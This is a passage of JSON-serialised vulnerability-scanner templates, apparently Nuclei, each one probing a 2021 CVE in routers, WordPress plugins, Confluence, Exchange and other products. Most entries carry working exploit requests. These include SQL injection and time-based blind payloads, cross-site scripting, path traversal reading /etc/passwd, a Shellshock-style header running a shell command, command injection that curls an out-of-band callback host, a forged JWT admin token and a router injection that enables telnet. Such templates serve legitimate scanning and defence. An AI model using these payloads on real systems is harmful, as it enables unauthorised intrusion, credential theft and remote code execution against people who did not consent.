{{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-20150","info":{"name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","severity":"medium"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ftp_username","ftp_password","ftp_permission","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<input name=\"admin_passwd\" type=\"password\" id=\"admin_passwd\" size=\"20\" maxlength=\"15\" value =\"(.*)\" />"],"part":"body"}]}]},{"id":"CVE-2021-35380","info":{"name":"TermTalk Server 3.24.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file?valore=../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-24915","info":{"name":"Contest Gallery < 13.1.0.6 - SQL injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WpUserId","Username","Usermail"],"condition":"and"},{"type":"word","part":"header","words":["text/csv","filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-24917","info":{"name":"WordPress WPS Hide Login <1.9.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nReferer: something\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["redirect_to=%2Fwp-admin%2Fsomething&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2021-46073","info":{"name":"Vehicle Service Management System 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /vehicle_service/classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /vehicle_service/classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1\n","GET /vehicle_service/admin/?page=user/list HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script> Test</td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40859","info":{"name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/about_state"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"pbx\"","\"dongleStatus\":0","\"macaddr\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37580","info":{"name":"Apache ShenYu Admin JWT - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dashboardUser HTTP/1.1\nHost: {{Hostname}}\nX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["query success","\"userName\":\"admin\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24351","info":{"name":"WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","the-plus-addons-for-elementor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3019","info":{"name":"ffay lanproxy Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../conf/config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"],"condition":"and"},{"type":"word","part":"body","words":["config.admin.username","config.admin.password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":"<script>alert(1)</script>"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"<script>alert(1)</script>\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-31195","info":{"name":"Microsoft Exchange Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain)//&et=ServerError","mail/bootr.ashx"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-44515","info":{"name":"Zoho ManageEngine Desktop Central - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /STATE_ID/123/agentLogUploader HTTP/1.1\nHost: {{Hostname}}\nCookie: STATE_COOKIE=&_REQS/_TIME/123\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 0"]},{"type":"word","part":"header","words":["UEMJSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24176","info":{"name":"WordPress JH 404 Logger <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["JH 404 Logger"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-41192","info":{"name":"Redash Setup Configuration - Default Secrets Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs","{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Enter your new password:","redash"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43421","info":{"name":"Studio-42 elFinder <2.1.60 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1\nHost: {{Hostname}}\n","GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-26247","info":{"name":"Cacti - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31589","info":{"name":"BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","bomgar"],"case-insensitive":true,"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24298","info":{"name":"WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["= Simple Giveaways"]}]},{"method":"GET","path":["{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46387","info":{"name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iMg src=x onerror=\"prompt(document.domain)\"><form>","Entry Error"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33807","info":{"name":"Cartadis Gespage 8.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["NetpDoDomainJoin:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29006","info":{"name":"rConfig 3.9.6 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /dashboard.php HTTP/1.1\nHost: {{Hostname}}\n","GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"word","part":"body_2","words":["rconfig"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2021-22054","info":{"name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"],"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25114","info":{"name":"WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(header_1, \"application/json\")","status_code == 200","contains(body_2, 'other_discount_code_')"],"condition":"and"}]}]},{"id":"CVE-2021-36450","info":{"name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\nHost: {{Hostname}}\n","POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><h1>Test</h1>26\" class=\"loginUserNameText"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrfp_login","group":1,"regex":["csrfp_login=([a-zA-Z0-9]+);"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-24245","info":{"name":"WordPress Stop Spammers <2021.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Stop Spammers Spam Prevention","Tags:"],"condition":"and"}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["ad\" accesskey=X onclick=alert(1)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20091","info":{"name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","POST /images/..%2fapply_abstract.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n\naction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/Success.htm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-24227","info":{"name":"Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-28073","info":{"name":"Ntopng Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css","{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"],"matchers-condition":"and","matchers":[{"type":"word","words":["application/json"],"part":"header"},{"type":"word","words":["\"results\":","\"name\":","\"tab\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41460","info":{"name":"ECShop 4.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /delete_cart_goods.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<strong><img src onerror=alert(document.domain)></strong>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40438","info":{"name":"Apache <= 2.4.48 Mod_Proxy - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}/"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains_all(header, \"X-Interactsh-Version\", \"Server: oast\")","!contains(body, '<h1> Interactsh Server </h1>')"],"condition":"and"}]}]},{"id":"CVE-2021-40875","info":{"name":"Gurock TestRail Application files.md5 Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files.md5","{{BaseURL}}/testrail/files.md5"],"stop-at-first-match":true,"max-size":1000,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["app/arguments/admin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21881","info":{"name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic dXNlcjp1c2Vy\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46UEFTUw==\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-22145","info":{"name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_bulk"],"body":"@\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root_cause","truncated","reason"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-24943","info":{"name":"Registrations for the Events Calendar < 2.7.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nevent_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"Please enter the email you registered with\")"],"condition":"and"}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-30134","info":{"name":"Php-mod/curl Library <2.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["key\":\"<img src onerror=alert(document.domain)>\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26084","info":{"name":"Confluence Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n"],"payloads":{"path":["pages/createpage-entervariables.action?SpaceKey=x","pages/createpage-entervariables.action","confluence/pages/createpage-entervariables.action?SpaceKey=x","confluence/pages/createpage-entervariables.action","wiki/pages/createpage-entervariables.action?SpaceKey=x","wiki/pages/createpage-entervariables.action","pages/doenterpagevariables.action","pages/createpage.action?spaceKey=myproj","pages/templates2/viewpagetemplate.action","pages/createpage-entervariables.action","template/custom/content-editor","templates/editor-preload-container","users/user-dark-features"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"aaaa{140592=null}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40149","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Private Key 